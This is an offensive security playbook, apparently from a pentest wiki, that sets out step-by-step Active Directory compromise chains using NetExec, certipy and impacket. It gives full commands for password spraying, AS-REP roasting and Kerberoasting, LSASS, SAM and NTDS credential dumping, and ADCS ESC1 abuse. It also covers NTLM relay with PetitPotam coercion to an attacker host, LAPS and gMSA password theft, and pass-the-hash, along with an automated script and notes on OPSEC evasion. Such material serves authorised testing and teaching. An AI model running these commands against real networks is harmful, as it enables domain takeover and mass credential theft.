Active Directory Attacks via NetExec
#Overview
NetExec can execute complete AD attack chains — from unauthenticated enumeration to Domain Admin — using a single tool. This page documents end-to-end workflows that combine SMB and LDAP protocols with NetExec's module ecosystem to replicate the most common AD attack paths.
#Attack Chain 1: Anonymous → Valid Credentials → Domain Admin
#Phase 1: Unauthenticated Enumeration
# Check for null session SMB access
netexec smb 10.10.10.0/24 -u '' -p '' --shares
# Any shares listed → null session possible
# Check SMB signing status (relay attack surface)
netexec smb 10.10.10.0/24 -u '' -p '' -M scuffy
# signing:False → relay candidate
# Check WebClient status (coercion + relay)
netexec smb 10.10.10.0/24 -u '' -p '' -M wcc
# WebClient:Running → coercion possible
# Anonymous LDAP enumeration
netexec ldap 10.10.10.5 -u '' -p '' --users
# If users returned → anonymous LDAP bind allowed
# AS-REP roasting without credentials
netexec ldap 10.10.10.5 -u '' -p '' --asreproast asrep.txt
# If hashes returned → roastable accounts exist
BASH
#Phase 2: Obtain Initial Credentials
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
# If no roastable accounts, try common passwords
netexec smb 10.10.10.0/24 -u users.txt -p 'Password1' --continue-on-success
netexec smb 10.10.10.0/24 -u users.txt -p 'CompanyName2024!' --continue-on-success
BASH
#Phase 3: Enumerate with Valid Credentials
# Full LDAP enumeration
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --users
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --groups
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --trusted-for-delegation
netexec ldap 10.10.10.5 -u valid_user -p valid_pass -M adcs
netexec ldap 10.10.10.5 -u valid_user -p valid_pass -M laps
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --gmsa
# BloodHound collection
netexec ldap 10.10.10.5 -u valid_user -p valid_pass -M bloodhound
# SMB session enumeration (find where admins are logged on)
netexec smb 10.10.10.0/24 -u valid_user -p valid_pass --sessions
netexec smb 10.10.10.0/24 -u valid_user -p valid_pass --loggedon-users
BASH
#Phase 4: Credential Theft
# Kerberoasting
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --kerberoasting kerberoast.txt
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
# AS-REP roasting (with credentials, finds more targets)
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --asreproast asrep2.txt
hashcat -m 18200 asrep2.txt /usr/share/wordlists/rockyou.txt --force
# Validate cracked credentials
netexec smb 10.10.10.0/24 -u cracked_user -p cracked_pass --continue-on-success
BASH
#Phase 5: Privilege Escalation
# If cracked user has local admin on any host → dump SAM/LSA
netexec smb 10.10.10.5 -u cracked_admin -p cracked_pass --sam
netexec smb 10.10.10.5 -u cracked_admin -p cracked_pass --lsa
netexec smb 10.10.10.5 -u cracked_admin -p cracked_pass -M lsassy
# Check for ADCS escalation path
# (Requires certipy-ad, not NetExec directly)
certipy find -dc-ip 10.10.10.5 -u valid_user@domain.local -p valid_pass -vulnerable
# If ESC1 found:
certipy req -u valid_user@domain.local -p valid_pass -ca 'CA-Name' -template ESC1 -upn administrator@domain.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5
# Check for LAPS password access
netexec ldap 10.10.10.5 -u valid_user -p valid_pass -M laps -o READ=true
# If LAPS password readable → local admin on that computer
# Check for gMSA password access
netexec ldap 10.10.10.5 -u valid_user -p valid_pass --gmsa -o READ=true
# If gMSA password readable → service account compromise
BASH
#Phase 6: Domain Dominance
# If Domain Admin achieved → dump NTDS
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds
# Validate Domain Admin across all DCs
netexec smb dc_list.txt -u domain_admin -p pass
# Dump SAM/LSA on all hosts
netexec smb targets.txt -u domain_admin -p pass --sam --continue-on-success
netexec smb targets.txt -u domain_admin -p pass --lsa --continue-on-success
BASH
#Attack Chain 2: NTLM Relay to Domain Admin
# Step 1: Find relay-able targets (SMB signing:False)
netexec smb 10.10.10.0/24 -u '' -p '' -M scuffy | grep 'signing:False'
# Step 2: Find hosts with WebClient running (coercion targets)
netexec smb 10.10.10.0/24 -u '' -p '' -M wcc | grep 'WebClient:Running'
# Step 3: Set up relay (separate terminal)
sudo impacket-ntlmrelayx -t ldap://DC_IP --delegate-access -smb2support
# Step 4: Coerce authentication from WebClient host to attacker
# (Using PetitPotam or PrinterBug — separate tools)
python3 PetitPotam.py -u '' -p '' ATTACKER_IP WEBDAV_HOST_IP
# Step 5: Relay creates machine account with RBCD on DC
# Step 6: Request TGT as Domain Admin via RBCD
impacket-getST -spn cifs/DC.domain.local -impersonate administrator domain.local/MACHINE_ACCOUNT$:PASS
export KRB5CCNAME=administrator.ccache
impacket-secretsdump -k -no-pass DC.domain.local
BASH
#Attack Chain 3: Kerberoasting → Full Compromise
# Step 1: Enumerate SPNs
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
# Step 2: Crack offline
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force -O
# Target high-value SPNs first: sql_svc, svc_backup, *_admin
# Step 3: Validate cracked credential
netexec smb 10.10.10.0/24 -u cracked_svc -p cracked_pass --continue-on-success
# Check for (Pwn3d!) — local admin indicator
# Step 4: If service account has local admin somewhere → dump
netexec smb 10.10.10.5 -u cracked_svc -p cracked_pass --sam
netexec smb 10.10.10.5 -u cracked_svc -p cracked_pass --lsa
# Step 5: Check if service account is Domain Admin
netexec ldap 10.10.10.5 -u cracked_svc -p cracked_pass --groups | grep 'Domain Admins'
# Step 6: If Domain Admin → NTDS dump
netexec smb 10.10.10.5 -u cracked_svc -p cracked_pass --ntds
BASH
#Attack Chain 4: LAPS → Lateral Spread
# Step 1: Find LAPS-managed computers
netexec ldap 10.10.10.5 -u user -p pass -M laps
# Step 2: Check if current user can read LAPS passwords
netexec ldap 10.10.10.5 -u user -p pass -M laps -o READ=true
# If readable: get local admin password for each LAPS computer
# Step 3: Use LAPS password to access each computer
netexec smb COMPUTER1 -u administrator -p LAPS_PASS1 --sam
netexec smb COMPUTER2 -u administrator -p LAPS_PASS2 --sam
# Step 4: Check for credential overlap
# If local admin hashes match across computers → pass-the-hash
netexec smb 10.10.10.0/24 -u administrator -H ':COMMON_HASH' --continue-on-success --local-auth
BASH
#Attack Chain 5: gMSA → Service Account → Domain Escalation
# Step 1: Enumerate gMSA accounts
netexec ldap 10.10.10.5 -u user -p pass --gmsa
# Step 2: Check if current user can read gMSA password
netexec ldap 10.10.10.5 -u user -p pass --gmsa -o READ=true
# gMSA password is a 256-char complex password, auto-rotated
# Step 3: Use gMSA password to authenticate as the service account
# (Requires impacket or custom tooling — gMSA uses NTLM auth)
impacket-getTGT domain.local/GMSA_ACCOUNT$ -hashes :NTHASH
# Step 4: Check service account privileges
netexec ldap 10.10.10.5 -u 'GMSA_ACCOUNT$' -H ':NTHASH' --groups
# Some gMSA accounts have elevated group memberships
BASH
#Automated Multi-Stage Workflow
Combine everything into a scripted workflow:
#!/bin/bash
# Full AD assessment using NetExec
TARGETS="10.10.10.0/24"
DC="10.10.10.5"
USER="$1"
PASS="$2"
echo "[*] Phase 1: SMB signing and WebClient survey"
netexec smb $TARGETS -u '' -p '' -M scuffy -M wcc
echo "[*] Phase 2: LDAP enumeration"
netexec ldap $DC -u $USER -p $PASS --users
netexec ldap $DC -u $USER -p $PASS --groups
netexec ldap $DC -u $USER -p $PASS --trusted-for-delegation
netexec ldap $DC -u $USER -p $PASS -M adcs
netexec ldap $DC -u $USER -p $PASS -M laps
netexec ldap $DC -u $USER -p $PASS --gmsa
netexec ldap $DC -u $USER -p $PASS -M delegation
echo "[*] Phase 3: Kerberoasting and AS-REP roasting"
netexec ldap $DC -u $USER -p $PASS --kerberoasting kerberoast.txt
netexec ldap $DC -u $USER -p $PASS --asreproast asrep.txt
echo "[*] Phase 4: Session and logged-on enumeration"
netexec smb $TARGETS -u $USER -p $PASS --sessions --continue-on-success
netexec smb $TARGETS -u $USER -p $PASS --loggedon-users --continue-on-success
echo "[*] Phase 5: BloodHound collection"
netexec ldap $DC -u $USER -p $PASS -M bloodhound
echo "[*] Done. Review output and proceed to exploitation phase."
BASH
#Common Pitfalls
- ⚠️ Don't skip enumeration: The most common AD attack failure is insufficient enumeration. You can't attack what you don't know exists.
- ⚠️ Kerberoasting without cracking plan: Roasting 50 SPNs is pointless if you can't crack them. Target high-value SPNs with weak password patterns.
- ⚠️ Ignoring LAPS/gMSA: These are often overlooked attack paths. A single LAPS-readable password = local admin on multiple computers.
- ⚠️ Relay without signing check: Attempting NTLM relay to a host with
signing:Truewill fail. Always runscuffyfirst. - ⚠️ BloodHound without analysis: Collecting BloodHound data is step 1. Analyzing it for attack paths is step 2. Don't skip the analysis.
#OPSEC Considerations
| Phase | Noise Level | Notes |
|---|---|---|
| Unauthenticated enum | Low | Null sessions, SMB signing checks |
| Authenticated enum | Low–Medium | LDAP queries are normal; SMB sessions are normal |
| Kerberoasting | Medium | TGS-REQ events (4769) per roasted account |
| Credential dumping | High | Service creation, LSASS access |
| NTDS dump | Very High | Massive SMB traffic, volume shadow copy |
| Relay attacks | Medium | Incoming NTLM auth from coerced hosts |
#Post-Exploitation Value
Each attack chain culminates in one or more of:
- Domain Admin → full domain control
- NTDS.dit → every domain credential
- Enterprise Admin → cross-forest control (if trusts exist)
- LAPS passwords → local admin on specific computers
- gMSA passwords → service account compromise
- BloodHound graph → documented attack paths for reporting
#Cross-References
- SMB Operations — SMB enumeration and dumping
- LDAP Operations — LDAP enumeration and roasting
- Password Spraying — Initial credential acquisition
- Credential Dumping — Hash extraction techniques
- AD Attacks (General) — Full AD attack technique library
- Lateral Movement — Spreading after initial compromise